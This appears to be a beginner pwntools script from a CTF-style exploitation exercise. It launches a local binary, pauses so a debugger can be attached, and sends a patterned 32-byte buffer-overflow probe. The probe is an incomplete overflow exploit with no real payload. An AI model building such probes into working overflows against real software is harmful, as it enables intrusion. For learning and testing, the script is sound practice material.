8 lines
169 B
Python
8 lines
169 B
Python
from pwn import *
|
|
|
|
with process('./intro-pwn') as p:
|
|
print(p.recvuntil(b"?"))
|
|
input("open gdb")
|
|
print(p.sendline(b"A"*16+b"B"*8+b"C"*8))
|
|
p.interactive()
|